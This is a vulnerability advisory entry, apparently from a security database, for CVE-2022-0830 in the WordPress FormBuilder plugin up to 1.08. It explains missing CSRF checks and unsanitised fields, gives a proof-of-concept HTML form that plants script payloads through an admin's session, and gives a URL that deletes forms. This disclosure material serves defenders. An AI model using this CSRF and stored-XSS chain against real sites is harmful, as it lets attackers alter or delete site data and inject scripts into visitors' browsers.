Lucene search
Chiragh AroraWPEX-ID:114C0202-39F8-4748-AC0D-013D2D6F02F7HistoryMar 08, 2022 - 12:00 a.m.
FormBuilder <= 1.08 - Stored Cross-Site Scripting via CSRF
2022-03-0800:00:00
Chiragh Arora
71
0.001 Low
EPSS
Percentile
26.4%
The plugin does not have CSRF checks in place when creating/updating and deleting forms, and does not sanitise as well as escape its form field values. As a result, attackers could make logged in admin update and delete arbitrary forms via a CSRF attack, and put Cross-Site Scripting payloads in them.
Edit a form and put XSS payloads:
<html>
<body>
<form action="https://example.com/wp-admin/tools.php?page=formbuilder.php&fbaction=editForm&fbid=1" method="POST">
<input type="hidden" name="formbuilder[name]" value='A New Form"><script>alert(/XSS1/)</script>' />
<input type="hidden" name="formbuilder[subject]" value='Generic Website Feedback FormA New Form"><script>alert(/XSS2/)</script>' />
<input type="hidden" name="formbuilder[recipient]" value='[email protected] New Form"><script>alert(/XSS3/)</script>' />
<input type="hidden" name="formbuilder[method]" value="POST" />
<input type="hidden" name="formbuilder[action]" value="" />
<input type="hidden" name="formbuilder[thankyoutext]" value="" />
<input type="hidden" name="formbuilder[autoresponse]" value="" />
<input type="hidden" name="formbuilder[tags]" value="" />
<input type="hidden" name="Save" value="Save Form" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Delete a form: https://example.com/wp-admin/tools.php?page=formbuilder.php&fbtag=&pageNumber=&fbaction=removeForm&fbid=2Related
prion
prion
Cross site scripting
2022-04-04 16:15:00
cvelist
cvelist
CVE-2022-0830 FormBuilder <= 1.08 - Stored Cross-Site Scripting via CSRF
2022-04-04 15:35:50
cnvd
cnvd
WordPress FormBuilder plugin cross-site scripting vulnerability
2022-04-07 00:00:00
cve
cve
CVE-2022-0830
2022-04-04 16:15:09
wpvulndb
wpvulndb
FormBuilder <= 1.08 - Stored Cross-Site Scripting via CSRF
2022-03-08 00:00:00
nvd
nvd
CVE-2022-0830
2022-04-04 16:15:09